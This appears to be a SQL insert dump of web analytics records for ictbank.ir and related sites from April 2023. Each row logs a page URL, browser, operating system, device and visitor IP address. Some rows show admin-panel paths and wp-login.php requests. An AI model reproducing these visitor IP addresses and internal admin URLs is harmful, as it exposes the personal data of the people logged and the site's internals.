(31146,'2023-04-08','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,1,0),
(31147,'2023-04-08','https://ictbank.ir/dashtpodcast/wp-content/uploads/2020/04/Morteza-Ahmadi-Del-Bede.mp3','Safari','iOS','16.0','mobile:smart','iPhone','','46.114.159.47','000',0,1,0),
(31148,'2023-04-08','https://nikoo-academy.com/tag/%D8%A7%D8%B3%D8%A7%D8%AA%DB%8C%D8%AF','Chrome','Android','96.0.0.0','mobile:smart','Galaxy A72','','213.156.149.187','000',0,1,0),
(31149,'2023-04-08','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.237.142.16','000',0,38,0),
(31150,'2023-04-08','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','112.0.0.0','desktop','Unknown','','23.239.19.154','000',0,1,0),
(31151,'2023-04-08','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.227.82.69','000',0,1,0),
(31152,'2023-04-08','https://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.15','000',0,2,0),
(31153,'2023-04-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.119.75.154','000',0,45,0),
(31154,'2023-04-08','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(31155,'2023-04-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','50.87.176.97','000',0,1,0),
(31156,'2023-04-08','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','170.106.115.162','000',0,1,0),
(31157,'2023-04-08','https://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','88.99.136.18','000',0,1,0),
(31158,'2023-04-08','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','81.68.123.147','000',0,1,0),
(31159,'2023-04-08','https://ictbank.ir/blog','Firefox','Windows','79.0','desktop','Unknown','','50.21.190.245','000',0,1,0),
(31160,'2023-04-08','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.92.27.198','000',0,1,0),
(31161,'2023-04-08','https://ictbank.ir/blog','Firefox','Windows','56.0','desktop','Unknown','','104.248.29.181','000',0,1,0),
(31162,'2023-04-08','https://ictbank.ir/blog','Firefox','Windows','65.0','desktop','Unknown','','37.187.135.32','000',0,1,0),
(31163,'2023-04-09','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,4,0),
(31164,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','49.0','desktop','Unknown','','67.214.96.234','000',0,1,0),
(31165,'2023-04-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.119.75.154','000',0,5,0),
(31166,'2023-04-09','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(31167,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(31168,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','77.0','desktop','Unknown','','51.83.71.35','000',0,2,0),
(31169,'2023-04-09','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','3.95.174.112','000',0,1,0),
(31170,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','88.0','desktop','Unknown','','52.45.114.130','000',0,2,0),
(31171,'2023-04-09','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','94.102.49.193','000',0,2,0),
(31172,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','164.132.235.186','000',0,1,0),
(31173,'2023-04-09','http://yahoo.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','138.201.244.240','000',0,2,0),
(31174,'2023-04-09','http://yahoo.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','78.47.92.6','000',0,4,0),
(31175,'2023-04-09','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.163.30.104','000',0,1,0),
(31176,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','167.235.132.26','000',0,1,0),
(31177,'2023-04-09','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31178,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','70.0','desktop','Unknown','','67.205.41.45','000',0,1,0),
(31179,'2023-04-09','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.122','000',0,4,0),
(31180,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.12.175','000',0,5,0),
(31181,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','58.0','desktop','Unknown','','155.133.142.66','000',0,1,0),
(31182,'2023-04-09','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Pixel','','139.99.120.127','000',0,19,0),
(31183,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,3,0),
(31184,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','82.0','desktop','Unknown','','51.83.42.50','000',0,1,0),
(31185,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','61.0','desktop','Unknown','','5.189.175.23','000',0,1,0),
(31186,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31187,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.186.194.171','000',0,1,0),
(31188,'2023-04-09','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.121','000',0,2,0),
(31189,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','68.0','desktop','Unknown','','5.9.62.86','000',0,1,0),
(31190,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','77.74.177.119','000',0,1,0),
(31191,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','73.0','desktop','Unknown','','185.125.88.171','000',0,1,0),
(31192,'2023-04-09','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','194.26.135.17','000',0,2,0),
(31193,'2023-04-09','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.150.226','000',0,9,0),
(31194,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','78.0','desktop','Unknown','','54.37.35.148','000',0,1,0),
(31195,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','89.0.0.0','desktop','Unknown','','86.17.122.117','000',0,1,0),
(31196,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','88.0','desktop','Unknown','','72.10.162.214','000',0,1,0),
(31197,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','128.90.21.78','000',0,70,0),
(31198,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','48.0','desktop','Unknown','','173.212.235.41','000',0,1,0),
(31199,'2023-04-09','https://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.203.9.176','000',0,1,0),
(31200,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','168.119.81.82','000',0,1,0),
(31201,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','78.0','desktop','Unknown','','37.187.138.50','000',0,1,0),
(31202,'2023-04-09','http://mail.design-arena.ir/blog/wp-login.php','Safari','OS X','12.0.0','desktop','Macintosh','','118.176.16.108','000',0,3,0),
(31203,'2023-04-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','122.252.229.23','000',0,1,0),
(31204,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','44.0','desktop','Unknown','','185.243.11.35','000',0,1,0),
(31205,'2023-04-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','194.26.192.189','000',0,21,0),
(31206,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','45.0','desktop','Unknown','','62.171.178.15','000',0,1,0),
(31207,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','202.29.5.202','000',0,127,0),
(31208,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','64.0','desktop','Unknown','','167.99.142.227','000',0,1,0),
(31209,'2023-04-09','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.26.233.84','000',0,1,0),
(31210,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','60.0','desktop','Unknown','','185.199.223.13','000',0,1,0),
(31211,'2023-04-09','https://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.164.227','000',0,2,0),
(31212,'2023-04-09','https://ictbank.ir/blog','Chrome','Windows','99.0.0.0','desktop','Unknown','','170.64.181.27','000',0,1,0),
(31213,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','40.0','desktop','Unknown','','46.32.255.120','000',0,1,0),
(31214,'2023-04-09','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','62.0.0.0','desktop','Unknown','','185.119.81.105','000',0,2,0),
(31215,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','78.0','desktop','Unknown','','195.201.228.120','000',0,1,0),
(31216,'2023-04-09','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','46.191.184.223','000',0,7,0),
(31217,'2023-04-09','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(31218,'2023-04-09','https://ictbank.ir/blog','Firefox','Windows','63.0','desktop','Unknown','','149.248.38.137','000',0,1,0),
(31219,'2023-04-09','https://ictbank.ir/blog','Firefox','Ubuntu','72.0','desktop','Unknown','','170.106.115.162','000',0,19,0),
(31220,'2023-04-09','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','43.130.33.139','000',0,3,0),
(31221,'2023-04-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','43.130.33.139','000',0,42,0),
(31222,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','43.0','desktop','Unknown','','80.211.28.72','000',0,1,0),
(31223,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.126','000',0,6,0),
(31224,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','117.0','desktop','Unknown','','195.146.37.212','000',0,1,0),
(31225,'2023-04-10','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,2,0),
(31226,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','85.0','desktop','Unknown','','195.201.233.91','000',0,1,0),
(31227,'2023-04-10','https://ictbank.ir/blog','Chrome','OS X','111.0.0.0','desktop','Macintosh','','194.26.135.17','000',0,4,0),
(31228,'2023-04-10','https://ictbank.ir/blog','Chrome','Linux','110.0.0.0','desktop','Unknown','','195.211.44.77','000',0,1,0),
(31229,'2023-04-10','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','57.0.0.0','desktop','Unknown','','185.119.81.105','000',0,4,0),
(31230,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','98.0','desktop','Unknown','','185.85.17.117','000',0,1,0),
(31231,'2023-04-10','https://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','194.233.162.47','000',0,1,0),
(31232,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','68.0','desktop','Unknown','','77.235.61.66','000',0,1,0),
(31233,'2023-04-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(31234,'2023-04-10','https://ictbank.ir/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','46.191.184.223','000',0,31,0),
(31235,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','100.0','desktop','Unknown','','165.227.28.0','000',0,1,0),
(31236,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','60.0','desktop','Unknown','','195.231.1.109','000',0,1,0),
(31237,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','62.0','desktop','Unknown','','212.224.88.6','000',0,1,0),
(31238,'2023-04-10','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','213.32.122.82','000',0,1,0),
(31239,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','89.40.116.124','000',0,1,0),
(31240,'2023-04-10','https://ictbank.ir/blog','Firefox','OS X','80.0','desktop','Macintosh','','94.102.49.193','000',0,1,0),
(31241,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','92.0','desktop','Unknown','','89.36.215.16','000',0,1,0),
(31242,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(31243,'2023-04-10','https://45.92.94.221/','Chrome','OS X','17.0.0.0','desktop','Macintosh','','152.32.145.137','000',0,9,0),
(31244,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','89.0','desktop','Unknown','','104.248.29.181','000',0,2,0),
(31245,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','80.0','desktop','Unknown','','31.187.84.50','000',0,1,0),
(31246,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','61.0','desktop','Unknown','','77.68.31.219','000',0,1,0),
(31247,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','99.0','desktop','Unknown','','69.163.199.207','000',0,2,0),
(31248,'2023-04-10','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31249,'2023-04-10','https://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','103.0.0.0','desktop','Unknown','','46.0.11.135','000',0,2,0),
(31250,'2023-04-10','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31251,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','90.0','desktop','Unknown','','34.252.141.13','000',0,1,0),
(31252,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','72.0','desktop','Unknown','','164.132.235.186','000',0,1,0),
(31253,'2023-04-10','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(31254,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','63.0','desktop','Unknown','','213.160.71.106','000',0,1,0),
(31255,'2023-04-10','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','111.0.0.0','desktop','Unknown','','31.7.107.99','000',0,19,0),
(31256,'2023-04-10','https://ictbank.ir/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','45.133.220.199','000',0,1,0),
(31257,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','72.0','desktop','Unknown','','146.59.147.11','000',0,1,0),
(31258,'2023-04-10','https://ictbank.ir/hooman/admin/index.php?pid=students&student_id=17&func=courses','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.153.212','000',0,25,0),
(31259,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','71.0','desktop','Unknown','','18.132.123.28','000',0,1,0),
(31260,'2023-04-10','https://45.92.94.221:443/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,6,0),
(31261,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','78.0','desktop','Unknown','','149.13.148.65','000',0,1,0),
(31262,'2023-04-10','https://ictbank.ir/hooman/admin/index.php','Chrome','Windows','111.0.0.0','desktop','Unknown','','5.237.144.81','000',0,17,0),
(31263,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','84.0','desktop','Unknown','','188.166.79.199','000',0,1,0),
(31264,'2023-04-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.86.176.78','000',0,2,0),
(31265,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','80.0','desktop','Unknown','','118.126.65.75','000',0,1,0),
(31266,'2023-04-10','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(31267,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','92.0','desktop','Unknown','','31.207.33.82','000',0,1,0),
(31268,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','108.163.128.244','000',0,1,0),
(31269,'2023-04-10','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(31270,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','69.0','desktop','Unknown','','94.177.230.95','000',0,1,0),
(31271,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','37.200.66.139','000',0,1,0),
(31272,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','51.0','desktop','Unknown','','51.75.120.114','000',0,1,0),
(31273,'2023-04-10','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.7','000',0,2,0),
(31274,'2023-04-10','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.136.78','000',0,1,0),
(31275,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','69.0','desktop','Unknown','','116.203.176.153','000',0,1,0),
(31276,'2023-04-10','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.119.81.98','000',0,4,0),
(31277,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','88.0','desktop','Unknown','','159.65.198.97','000',0,1,0),
(31278,'2023-04-10','https://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.184','000',0,1,0),
(31279,'2023-04-10','https://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.62','000',0,1,0),
(31280,'2023-04-10','https://ictbank.ir/blog','Unknown','Android','Unknown','mobile:smart','Redmi Note 9 Pro','','192.42.116.210','000',0,1,0),
(31281,'2023-04-10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','97.74.88.138','000',0,2,0),
(31282,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','100.0','desktop','Unknown','','173.249.41.202','000',0,1,0),
(31283,'2023-04-10','https://ictbank.ir/dashtpodcast/wp-content/uploads/2020/04/Morteza-Ahmadi-Del-Bede.mp3','Safari','iOS','16.0','mobile:smart','iPhone','','2.176.122.143','000',0,7,0),
(31284,'2023-04-10','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.138','000',0,1,0),
(31285,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','92.0','desktop','Unknown','','185.36.168.129','000',0,1,0),
(31286,'2023-04-10','https://ictbank.ir/blog','Firefox','Windows','86.0','desktop','Unknown','','195.228.75.27','000',0,1,0),
(31287,'2023-04-11','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(31288,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','92.0','desktop','Unknown','','5.249.159.250','000',0,1,0),
(31289,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','96.0','desktop','Unknown','','8.135.110.238','000',0,1,0),
(31290,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','9.0.0','desktop','Unknown','','208.80.194.121','000',0,5,0),
(31291,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','60.0','desktop','Unknown','','193.107.88.42','000',0,1,0),
(31292,'2023-04-11','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.137','000',0,1,0),
(31293,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','89.46.70.182','000',0,1,0),
(31294,'2023-04-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','192.3.232.23','000',0,2,0),
(31295,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','71.0','desktop','Unknown','','188.213.167.24','000',0,1,0),
(31296,'2023-04-11','https://yandex.ru/','Opera','Windows','97.0.0.0','desktop','Unknown','','80.82.63.82','000',0,1,0),
(31297,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','47.0','desktop','Unknown','','139.162.192.87','000',0,1,0),
(31298,'2023-04-11','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(31299,'2023-04-11','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','173.254.29.38','000',0,1,0),
(31300,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','110.0','desktop','Unknown','','34.212.114.15','000',0,1,0),
(31301,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','54.0','desktop','Unknown','','185.199.223.13','000',0,1,0),
(31302,'2023-04-11','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','51.254.213.67','000',0,1,0),
(31303,'2023-04-11','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','128.199.179.16','000',0,4,0),
(31304,'2023-04-11','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','54.36.163.203','000',0,5,0),
(31305,'2023-04-11','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','63.0.0.0','desktop','Unknown','','185.119.81.98','000',0,4,0),
(31306,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','57.0','desktop','Unknown','','91.142.208.45','000',0,1,0),
(31307,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','92.0','desktop','Unknown','','151.80.20.136','000',0,1,0),
(31308,'2023-04-11','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','185.163.47.8','000',0,1,0),
(31309,'2023-04-11','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','154.209.125.115','000',0,3,0),
(31310,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','83.0','desktop','Unknown','','85.128.143.28','000',0,2,0),
(31311,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','49.0','desktop','Unknown','','151.236.35.63','000',0,1,0),
(31312,'2023-04-11','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.119.96.179','000',0,1,0),
(31313,'2023-04-11','https://ictbank.ir/blog','Chrome','OS X','14.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(31314,'2023-04-11','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','172.107.98.166','000',0,10,0),
(31315,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','74.0','desktop','Unknown','','185.160.122.50','000',0,1,0),
(31316,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','146.59.207.14','000',0,1,0),
(31317,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','99.0','desktop','Unknown','','91.195.80.8','000',0,1,0),
(31318,'2023-04-11','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.36','000',0,2,0),
(31319,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','84.0','desktop','Unknown','','65.108.45.6','000',0,1,0),
(31320,'2023-04-11','https://ictbank.ir/blog','Chrome','OS X','103.0.0.0','desktop','Macintosh','','138.199.18.75','000',0,2,0),
(31321,'2023-04-11','https://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(31322,'2023-04-11','https://ictbank.ir/blog','Chrome','OS X','107.0.0.0','desktop','Macintosh','','54.237.173.196','000',0,1,0),
(31323,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','75.0','desktop','Unknown','','149.154.68.207','000',0,1,0),
(31324,'2023-04-11','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.194','000',0,1,0),
(31325,'2023-04-11','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','54.193.12.56','000',0,2,0),
(31326,'2023-04-11','https://ictbank.ir/hooman/admin/','Chrome','Windows','112.0.0.0','desktop','Unknown','','5.238.37.73','000',0,19,0),
(31327,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','52.0','desktop','Unknown','','185.35.56.246','000',0,1,0),
(31328,'2023-04-11','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','188.166.179.135','000',0,4,0),
(31329,'2023-04-11','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','5.196.113.25','000',0,1,0),
(31330,'2023-04-11','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','92.222.70.66','000',0,4,0),
(31331,'2023-04-11','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','37.59.42.94','000',0,5,0),
(31332,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','61.0','desktop','Unknown','','143.198.112.66','000',0,1,0),
(31333,'2023-04-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.221.73.166','000',0,2,0),
(31334,'2023-04-11','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.145','000',0,1,0),
(31335,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','98.0','desktop','Unknown','','82.220.38.63','000',0,2,0),
(31336,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','116.62.49.96','000',0,1,0),
(31337,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','48.0','desktop','Unknown','','141.94.76.12','000',0,2,0),
(31338,'2023-04-11','https://ictbank.ir/blog','Chrome','Windows','109.0.0.0','desktop','Unknown','','144.126.146.25','000',0,97,0),
(31339,'2023-04-11','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.133.58','000',0,2,0),
(31340,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','56.0','desktop','Unknown','','144.76.65.21','000',0,1,0),
(31341,'2023-04-11','https://design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','193.118.55.162','000',0,2,0),
(31342,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','69.0','desktop','Unknown','','5.61.47.171','000',0,1,0),
(31343,'2023-04-11','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,1,0),
(31344,'2023-04-11','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,4,0),
(31345,'2023-04-11','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(31346,'2023-04-11','https://www.ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,2,0),
(31347,'2023-04-11','https://45.92.94.221/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.44.114','000',0,1,0),
(31348,'2023-04-11','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','205.185.118.120','000',0,2,0),
(31349,'2023-04-11','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,2,0),
(31350,'2023-04-11','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,2,0),
(31351,'2023-04-11','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','51.81.167.146','000',0,1,0),
(31352,'2023-04-11','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','GALAXY S SC-02B','','39.110.218.101','000',0,1,0),
(31353,'2023-04-11','https://ictbank.ir/blog','Chrome','Android','88.0.0.0','mobile:smart','Pixel 2 XL','','149.14.101.186','000',0,1,0),
(31354,'2023-04-11','https://ictbank.ir/blog','Chrome','Windows','85.0.0.0','desktop','Unknown','','34.203.224.171','000',0,1,0),
(31355,'2023-04-11','https://ictbank.ir/blog','Opera','Windows','64.0.0.0','desktop','Unknown','','37.225.77.227','000',0,1,0),
(31356,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','70.0','desktop','Unknown','','188.147.4.36','000',0,1,0),
(31357,'2023-04-11','https://ictbank.ir/blog','Firefox','Linux','10.0','desktop','Unknown','','179.43.169.181','000',0,1,0),
(31358,'2023-04-11','https://ictbank.ir/blog','Safari','iOS','10.0','mobile:smart','iPhone','','93.119.227.91','000',0,1,0),
(31359,'2023-04-11','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,2,0),
(31360,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','85.0','desktop','Unknown','','164.132.235.186','000',0,1,0),
(31361,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','44.0','desktop','Unknown','','77.68.31.219','000',0,1,0),
(31362,'2023-04-11','https://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','118.193.36.159','000',0,1,0),
(31363,'2023-04-11','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','GALAXY S SC-02B','','133.242.140.127','000',0,1,0),
(31364,'2023-04-11','https://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','GALAXY S SC-02B','','133.242.174.119','000',0,1,0),
(31365,'2023-04-11','https://ictbank.ir/blog','Firefox','Windows','92.0','desktop','Unknown','','51.195.151.203','000',0,1,0),
